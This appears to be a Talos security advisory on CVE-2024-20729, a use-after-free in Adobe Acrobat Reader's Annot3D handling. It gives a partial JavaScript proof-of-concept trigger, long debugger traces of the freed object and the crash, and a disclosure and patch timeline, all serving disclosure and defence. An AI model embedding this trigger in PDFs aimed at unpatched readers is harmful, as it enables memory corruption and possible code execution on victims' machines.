CVE-2024-20729
A use-after-free vulnerability exists in the Annot3D functionality of Adobe Acrobat Reader 2023.006.20380. A specially crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and could result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Adobe Acrobat Reader 2023.006.20380
Acrobat Reader - https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs.
Adobe’s PDF Reader creates an Annot3D object if a page contains a 3D type image. There exists a use-after-free vulnerability in the way Adobe Acrobat Reader handles an Annot3D object. This can be illustrated by the following proof-of-concept code:
function main() {
main_run++;
t = {toString:set_page} ;
app.activeDocs[0].getField('Text Field1').setFocus();
app.activeDocs[0].getPageNthWordQuads(0, t);
}
function set_page() {
app.activeDocs[0].pageNum = 4;
}
[..]
function zoomtype() {
app.activeDocs[0].zoomType = zoomtype.fitV;
}
In the above excerpt, the toString
property of the variable t
is set to the callback function set_page
. The callback triggers when the setFocus
method is called. The set_page
sets the page, which triggers zoomtype
method. This call frees a number of objects, including the Annot3D object. The use-after-free vulnerability occurs when the freed Annot3D object is used without any validation. We can observe the following in the debugger (with PageHeap enabled):
eax=0fd60f00 ebx=0536d9d4 ecx=00000001 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2f79 esp=0536d8d4 ebp=0536d9c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d6d9:
6ebd2f79 68b8010000 push 1B8h
0:000> p
eax=0fd60f00 ebx=0536d9d4 ecx=00000001 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2f7e esp=0536d8d0 ebp=0536d9c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d6de:
6ebd2f7e e80944e4ff call AcroRd32!AcroWinMainSandbox+0x4abc (6ea1738c) ; <--------- (1)
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=00000001 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f83 esp=0536d8d0 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e3:
6ebd2f83 59 pop ecx
0:000> dd eax ; <--------- (2)
bb502e48 00000000 00000000 00000000 00000000
bb502e58 00000000 00000000 00000000 00000000
bb502e68 00000000 00000000 00000000 00000000
bb502e78 00000000 00000000 00000000 00000000
bb502e88 00000000 00000000 00000000 00000000
bb502e98 00000000 00000000 00000000 00000000
bb502ea8 00000000 00000000 00000000 00000000
bb502eb8 00000000 00000000 00000000 00000000
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=000001b8 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f84 esp=0536d8d4 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e4:
6ebd2f84 59 pop ecx
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=00000001 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f85 esp=0536d8d8 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6e5:
6ebd2f85 8bc8 mov ecx,eax
[...]
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f98 esp=0536d8d4 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6f8:
6ebd2f98 ff7010 push dword ptr [eax+10h] ds:002b:852e0f70=8dc44eb0
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9b esp=0536d8d0 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fb:
6ebd2f9b 57 push edi
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9c esp=0536d8cc ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fc:
6ebd2f9c 56 push esi
0:000> p
eax=852e0f60 ebx=0536d9d4 ecx=bb502e48 edx=00000000 esi=c0010000 edi=00000012
eip=6ebd2f9d esp=0536d8c8 ebp=0536d9c8 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!CTJPEGReader::operator=+0x2d6fd:
6ebd2f9d e86588c500 call AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc037 (6f82b807) ; <----- (3)
0:000> p
eax=bb502e48 ebx=0536d9d4 ecx=6f82ba18 edx=07ca0000 esi=c0010000 edi=00000012
eip=6ebd2fa2 esp=0536d8d8 ebp=0536d9c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!CTJPEGReader::operator=+0x2d702:
6ebd2fa2 eb65 jmp AcroRd32!CTJPEGReader::operator=+0x2d769 (6ebd3009)
0:000> dd bb502e48 ; <----- (4)
bb502e48 7043e3c8 00000000 00000000 ffffffff
bb502e58 00000000 00000000 00000000 00000000
bb502e68 00000000 00000000 00000000 00000000
bb502e78 00000000 00000000 00000000 00000002
bb502e88 8dc44eb0 bb508ff8 00000027 00000000
bb502e98 702da7e8 bb514fe8 00000000 00000000
bb502ea8 00000000 00000000 00000000 00000000
bb502eb8 00000000 00000000 00000000 00000000
At (1)
above, a function is called which calls malloc
to allocate an Annot3D object of the size 0x1B8. The initializiation of the Annot3D object happens by call at (3). We can observe the buffer value after the initializiation at (4)
.
0:000> u
AcroRd32!AIDE::PixelPartInfo::operator=+0x50432b:
6f833afb 8b8bbc000000 mov ecx,dword ptr [ebx+0BCh] <------------------- (5)
6f833b01 0fb7f0 movzx esi,ax
6f833b04 33c0 xor eax,eax
6f833b06 50 push eax
6f833b07 e82d4444ff call AcroRd32!CTJPEGReader::operator=+0xd2699 (6ec77f39)
6f833b0c 8b8bbc000000 mov ecx,dword ptr [ebx+0BCh]
6f833b12 33c0 xor eax,eax
6f833b14 85c9 test ecx,ecx
0:000> p
eax=00000001 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000000 edi=00000001
eip=6f833b01 esp=0536d660 ebp=0536d67c iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x504331:
6f833b01 0fb7f0 movzx esi,ax
0:000> p
eax=00000001 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b04 esp=0536d660 ebp=0536d67c iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x504334:
6f833b04 33c0 xor eax,eax
0:000> p
eax=00000000 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b06 esp=0536d660 ebp=0536d67c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x504336:
6f833b06 50 push eax
0:000> p
eax=00000000 ebx=bb502e48 ecx=b080cdb8 edx=05110000 esi=00000001 edi=00000001
eip=6f833b07 esp=0536d65c ebp=0536d67c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x504337:
6f833b07 e82d4444ff call AcroRd32!CTJPEGReader::operator=+0xd2699 (6ec77f39) <--------------- [6]
[...]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be4a esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc67a:
6f82be4a f6450801 test byte ptr [ebp+8],1 ss:002b:0536d29c=01
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be4e esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc67e:
6f82be4e 7423 je AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc6a3 (6f82be73) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be50 esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc680:
6f82be50 f6450804 test byte ptr [ebp+8],4 ss:002b:0536d29c=01
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be54 esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc684:
6f82be54 7510 jne AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc696 (6f82be66) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be56 esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc686:
6f82be56 8365fc00 and dword ptr [ebp-4],0 ss:002b:0536d290=ffffffff
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5a esp=0536d280 ebp=0536d294 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68a:
6f82be5a 85f6 test esi,esi
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5c esp=0536d280 ebp=0536d294 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68c:
6f82be5c 7415 je AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc6a3 (6f82be73) [br=0]
0:000> p
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5e esp=0536d280 ebp=0536d294 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68e:
6f82be5e 56 push esi <----------------------------------- [7]
0:000> dd esi
bb502e48 70169d20 00000000 00000000 ffffffff
bb502e58 00000000 00000000 00000000 00000006
bb502e68 00000002 00000008 00000001 00000001
bb502e78 00000000 00000000 00000000 00000002
bb502e88 8dc44eb0 bb508ff8 00000027 00000000
bb502e98 70169d20 bb514fe8 00000000 00000000
bb502ea8 00000000 00000000 00000000 00000000
bb502eb8 00000000 00000000 00000000 00000000
0:000> t
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6f82be5f esp=0536d27c ebp=0536d294 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AIDE::PixelPartInfo::operator=+0x4fc68f:
6f82be5f e81cec1eff call AcroRd32!AcroWinMainSandbox+0x81b0 (6ea1aa80)
0:000> t
eax=00000001 ebx=852e0f60 ecx=a1c24d18 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6ea1aa80 esp=0536d278 ebp=0536d294 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AcroWinMainSandbox+0x81b0:
6ea1aa80 55 push ebp
0:000> pc
eax=70d0283c ebx=852e0f60 ecx=76dc3c50 edx=07ca0000 esi=76dc3c50 edi=bb502e48
eip=6ea1aa91 esp=0536d26c ebp=0536d274 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
AcroRd32!AcroWinMainSandbox+0x81c1:
6ea1aa91 ff15a8471170 call dword ptr [AcroRd32!AcroSecurityBailOutImpl+0x32fa88 (701147a8)] ds:002b:701147a8={ntdll!LdrpValidateUserCallTarget (77a988f0)}
0:000> pc
eax=0edb878a ebx=852e0f60 ecx=76dc3c50 edx=00810400 esi=76dc3c50 edi=bb502e48
eip=6ea1aa97 esp=0536d26c ebp=0536d274 iopl=0 nv up ei pl zr na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000247
AcroRd32!AcroWinMainSandbox+0x81c7:
6ea1aa97 ffd6 call esi {ucrtbase!free (76dc3c50)} <------------------------------ [8]
0:000> dd bb502e48 <------------------------------ [9]
bb502e48 70169d20 00000000 00000000 ffffffff
bb502e58 00000000 00000000 00000000 00000006
bb502e68 00000002 00000008 00000001 00000001
bb502e78 00000000 00000000 00000000 00000002
bb502e88 8dc44eb0 bb508ff8 00000027 00000000
bb502e98 70169d20 bb514fe8 00000000 00000000
bb502ea8 00000000 00000000 00000000 00000000
bb502eb8 00000000 00000000 00000000 00000000
0:000> p
eax=00000001 ebx=852e0f60 ecx=07ca0000 edx=07ca0000 esi=76dc3c50 edi=bb502e48
eip=6ea1aa99 esp=0536d26c ebp=0536d274 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
AcroRd32!AcroWinMainSandbox+0x81c9:
6ea1aa99 59 pop ecx
0:000> dd bb502e48 <------------------------------ [10]
bb502e48 ???????? ???????? ???????? ????????
bb502e58 ???????? ???????? ???????? ????????
bb502e68 ???????? ???????? ???????? ????????
bb502e78 ???????? ???????? ???????? ????????
bb502e88 ???????? ???????? ???????? ????????
bb502e98 ???????? ???????? ???????? ????????
bb502ea8 ???????? ???????? ???????? ????????
bb502eb8 ???????? ???????? ???????? ????????
0:000> pt
eax=00000001 ebx=852e0f60 ecx=bb502e48 edx=07ca0000 esi=bb502e48 edi=bb502e48
eip=6ea1aa9c esp=0536d278 ebp=0536d294 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
AcroRd32!AcroWinMainSandbox+0x81cc:
6ea1aa9c c3 ret
At [5]
above, the ebx
register contains the vulnerable Annot3D buffer. The method called at [6]
eventually calls free
at [8]
. The argument of the free
function comes from the esi
register at [7]
. The value of the vulnerable buffer is examined at [9]
, and [10]
shows its value before and after the free
function is called. The vulnerable freed buffer is later used without any validation. This can be observed in a debugger at the time of the crash:
0:000> g
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): C++ EH exception - code e06d7363 (first chance)
(618.3bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=bb502e48 ecx=6ec7801f edx=00010000 esi=00000001 edi=00000001
eip=6f833b0c esp=0536d660 ebp=0536d67c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
AcroRd32!AIDE::PixelPartInfo::operator=+0x50433c:
6f833b0c 8b8bbc000000 mov ecx,dword ptr [ebx+0BCh] ds:002b:bb502f04=????????
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0536d67c 6ebe9a42 8dc44eb0 00000009 bb502e48 AcroRd32!AIDE::PixelPartInfo::operator=+0x50433c
01 0536dbb4 6ebd22e6 8dc44eb0 00000009 a1c24494 AcroRd32!CTJPEGReader::operator=+0x441a2
02 0536dbf4 6f479f3e 8dc44eb0 00000001 6f479ea0 AcroRd32!CTJPEGReader::operator=+0x2ca46
03 0536dc1c 6ea8a20e 0536dcfc 8dc44eb0 0536dc98 AcroRd32!AIDE::PixelPartInfo::operator=+0x14a76e
04 0536dc2c 6ebcde76 00000000 0000088c a1c243f8 AcroRd32!DllCanUnloadNow+0x3f5ee
05 0536dc98 6ebc8745 0536dcfc a1c24240 8dc44eb0 AcroRd32!CTJPEGReader::operator=+0x285d6
06 0536dd20 6ebc8577 00000000 0536dd6c 8cef6f48 AcroRd32!CTJPEGReader::operator=+0x22ea5
07 0536dd34 6ec7bb5b 8dc44eb0 00000000 8cef6f48 AcroRd32!CTJPEGReader::operator=+0x22cd7
08 0536dd50 6ecb7a3a 8cef6f48 a1c242c4 8cef6f48 AcroRd32!CTJPEGReader::operator=+0xd62bb
09 0536dda4 6ecb7493 00000000 8cef6f48 00000000 AcroRd32!CTJPEGReader::operator=+0x11219a
0a 0536ddf8 6ebd5b86 00000001 a1c241c0 00000000 AcroRd32!CTJPEGReader::operator=+0x111bf3
0b 0536dea0 6ebc7d73 00000001 00000001 00000000 AcroRd32!CTJPEGReader::operator=+0x302e6
0c 0536def8 6ebd2544 00000000 6ebd2520 6ebd2510 AcroRd32!CTJPEGReader::operator=+0x224d3
0d 0536df14 6ebd104b 8dc44eb0 a1c240b8 8dc44eb0 AcroRd32!CTJPEGReader::operator=+0x2cca4
0e 0536dfd8 6ebd0934 00000001 6ebd0934 00000004 AcroRd32!CTJPEGReader::operator=+0x2b7ab
0f 0536dffc 8f445c90 8dc44eb0 00000004 000001ac AcroRd32!CTJPEGReader::operator=+0x2b094
10 0536e040 8f3fb0bb 8130cfb8 4e1ecff0 506b2ff0 EScript!PlugInMain+0x56820
11 0536e0ac 8f2e2009 8fc78000 0536e20c 0536e0cc EScript!PlugInMain+0xbc4b
12 0536e0f4 8f2b6ba1 8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0x36f99
13 0536e140 8f2b650b 8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0xbb31
14 0536e1e4 8f2dce6b 8fc78000 0536e20c 0536e20c EScript!mozilla::HashBytes+0xb49b
15 0536e224 8f2d5521 8fc78000 0536e264 8fccc4ce EScript!mozilla::HashBytes+0x31dfb
16 0536e3fc 8f2d372e 00000000 718baa1e 0536e404 EScript!mozilla::HashBytes+0x2a4b1
17 0536e428 8f2d368f 8fc78000 0536e438 8f4d2d98 EScript!mozilla::HashBytes+0x286be
18 0536e484 8f2d3503 8fc78000 0536e4ec 90129a10 EScript!mozilla::HashBytes+0x2861f
19 0536e4c0 8f2b8713 8fc78000 0536e4ec 90129a10 EScript!mozilla::HashBytes+0x28493
1a 0536e510 8f2f18bb 8fc78000 0536e558 00000000 EScript!mozilla::HashBytes+0xd6a3
1b 0536e594 8f40aebb 8fc78000 90129a10 8fc780c0 EScript!mozilla::HashBytes+0x4684b
1c 0536e748 8f40ab14 3fc0cff0 ce18efe0 509bcff0 EScript!PlugInMain+0x1ba4b
1d 0536e794 8f4098f3 3d170fc0 8130cfb8 dc4f0f40 EScript!PlugInMain+0x1b6a4
1e 0536e834 8f47671f 55c8ebc0 8130cfb8 d92def00 EScript!PlugInMain+0x1a483
1f 0536e894 6f35e120 00000000 c0010000 0000000c EScript!PlugInMain+0x872af
20 0536e92c 6f358e03 7a84ecf0 c0010000 0000000c AcroRd32!AIDE::PixelPartInfo::operator=+0x2e950
21 0536e97c 6f096fd7 c0010000 0000000c 0536ea28 AcroRd32!AIDE::PixelPartInfo::operator=+0x29633
22 0536e9ac 6f09754a c0010000 0000000c 6f358db0 AcroRd32!ixVectorNextHit+0x16c767
23 0536ea00 6f35dd9c c0010000 0000000c 6f358db0 AcroRd32!ixVectorNextHit+0x16ccda
24 0536eab0 6ec69998 7a84ecf0 c0010000 0000000c AcroRd32!AIDE::PixelPartInfo::operator=+0x2e5cc
25 0536eb48 6ec697bf 00000060 00000001 6ec697bf AcroRd32!CTJPEGReader::operator=+0xc40f8
26 0536eb68 6ec69741 8dc44eb0 00000001 2aa4af10 AcroRd32!CTJPEGReader::operator=+0xc3f1f
27 0536eb88 6ea970c6 6063cff8 a1c27480 2aa4af50 AcroRd32!CTJPEGReader::operator=+0xc3ea1
28 0536ebe0 6ea95cdf 004aafb2 a1c27318 1d3d3fd0 AcroRd32!DllCanUnloadNow+0x4c4a6
29 0536ec78 6ea9518a 004aafb2 6ea94f77 a1c273b0 AcroRd32!DllCanUnloadNow+0x4b0bf
2a 0536ecd0 6ea1d784 000004d3 00000000 00000113 AcroRd32!DllCanUnloadNow+0x4a56a
2b 0536ecec 75fb0eab 00060130 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0xaeb4
2c 0536ed18 75fa7e5a 6ea1d280 00060130 00000113 USER32!_InternalCallWinProc+0x2b
2d 0536edfc 75fa5bca 6ea1d280 00000000 00000113 USER32!UserCallWinProcCheckWow+0x33a
2e 0536ee70 75fa5990 00000013 0536ee94 6ea94773 USER32!DispatchMessageWorker+0x22a
2f 0536ee7c 6ea94773 0536eeb0 1d3bdda8 1d3bdda8 USER32!DispatchMessageW+0x10
30 0536ee94 6ea9445e 0536eeb0 a1c27068 1d3bdda8 AcroRd32!DllCanUnloadNow+0x49b53
31 0536ef08 6ea94289 a1c27020 1d3bdda8 00000000 AcroRd32!DllCanUnloadNow+0x4983e
32 0536ef40 6ea13043 a1c270d4 0d466ff8 00000000 AcroRd32!DllCanUnloadNow+0x49669
33 0536efb4 6ea12a5f 6e870000 00af0000 0d466ff8 AcroRd32!AcroWinMainSandbox+0x773
34 0536f3d8 00cd59d0 6e870000 00af0000 0d466ff8 AcroRd32!AcroWinMainSandbox+0x18f
35 0536f78c 00d21efa 00af0000 00000000 07cc0018 AcroRd32_exe!IsSandboxedProcess+0x126030
36 0536f7d8 76eefcc9 05004000 76eefcb0 0536f844 AcroRd32_exe!AcroRd32IsBrokerProcess+0x1d54a
37 0536f7e8 77a77c6e 05004000 d8baf044 00000000 KERNEL32!BaseThreadInitThunk+0x19
38 0536f844 77a77c3e ffffffff 77a98c32 00000000 ntdll!__RtlUserThreadStart+0x2f
39 0536f854 00000000 00cd1640 05004000 00000000 ntdll!_RtlUserThreadStart+0x1b
In the above debugger output, the crash occurs when ebx
is dereferenced, as if it were an object pointer. Depending on the memory layout of the process, it may be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
The vendor released a security bulletin at: https://helpx.adobe.com/security/products/acrobat/apsb24-07.html Patches can be found linked from this site
2023-12-19 - Vendor Disclosure
2024-02-13 - Vendor Patch Release
2024-02-15 - Public Release
Discovered by KPC of Cisco Talos.